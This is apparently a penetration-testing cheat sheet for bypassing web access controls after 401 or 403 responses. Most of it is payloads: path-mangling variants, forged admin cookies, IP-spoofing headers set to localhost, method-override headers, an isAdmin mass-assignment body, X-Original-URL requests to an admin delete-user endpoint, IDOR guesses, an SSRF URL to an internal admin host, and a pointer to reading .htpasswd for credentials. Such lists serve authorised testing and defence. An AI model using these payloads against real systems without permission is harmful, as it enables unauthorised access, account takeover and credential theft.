# Broken Access Control

The attacking methodology of broken access control in web applications. If we got 401 or 403 HTTP response, try to bypass it using the following methods in this post.

### Manipulate Path <a href="#manipulate-path" id="manipulate-path"></a>

```shellscript
/admin
/Admin
/ADMIN

/./admin
/.;/admin
/;/admin
/admin/
/admin/.

/admin%0d
/admin%0a
/admin%0d%0a

# Add a tab (or multiple tabs) after the path, not escape characters (`\t`).
# It's recommended to use BurpSuite Proxy.
/admin      HTTP/1.1
```

### Change Header Values <a href="#change-header-values" id="change-header-values"></a>

#### Cookie <a href="#cookie" id="cookie"></a>

We may be able to get access to the login-required pages.

```shellscript
Cookie: admin=true
Cookie: isAdmin=true
Cookie: access=1
Cookie: access=true
Cookie: login=true
Cookie: login=success

# Insert another user value
Cookie: session=<another_user_value>
Cookie: access_token=<another_user_value>
```

#### IP Spoofing <a href="#ip-spoofing" id="ip-spoofing"></a>

```shellscript
Cluster-Client-IP: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Original-URL: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

Host: 127.0.0.1
```

#### User Agent <a href="#user-agent" id="user-agent"></a>

Sometimes we can access another server by replacing the User Agent with the specific one.

```shellscript
User-Agent: <custom_user_agent>
```

### Change Methods <a href="#change-methods" id="change-methods"></a>

```shellscript
GET, POST, PUT, DELETE, HEAD, TRACE, OPTIONS, PATCH, INVENTED, CONNECT, etc.

# Override to bypass FireWall (via POST /example HTTP/1.1)
X-Method-Override: PUT
X-HTTP-Method-Override: PUT
```

### POST Parameters <a href="#post-parameters" id="post-parameters"></a>

```shellscript
POST / HTTP/1.1
...

{
    "email": "new-email@example.com",
    "isAdmin": true
}
```

#### X-Original-URL, X-Rewrite-URL <a href="#x-original-url-x-rewrite-url" id="x-original-url-x-rewrite-url"></a>

```shellscript
POST / HTTP/1.1

...
X-Original-URL: /admin/deleteuser
# or
X-Rewrite-URL: /admin/deleteuser
...

username=michael
```

### GET Parameters <a href="#get-parameters" id="get-parameters"></a>

```shellscript
https://vulnerable.com/account?id=michael
https://vulnerable.com/account?id=admin
https://vulnerable.com/account?id=administrator

# GUID cannot be guessed but it may be found somewhere in the website.
https://vulnerable.com/account?id=7230b2a9-60de-4409-a350-cd14986a8d3e
https://vulnerable.com/account?id=1de655cb-29d7-4008-b434-e688b39f9564
```

### Access Page via SSRF <a href="#access-page-via-ssrf" id="access-page-via-ssrf"></a>

If there is another website that is owned by same orginazation, we may be able to see the target website with SSRF.

```shellscript
https://example.com?url=https://admin.example.com/
```

### Read `.htpasswd` <a href="#read-htpasswd" id="read-htpasswd"></a>

If the target website is protected with **Authorization (WWW-Authenticate)**, we may be able to get credentials by reading `.htpasswd` file in the web root.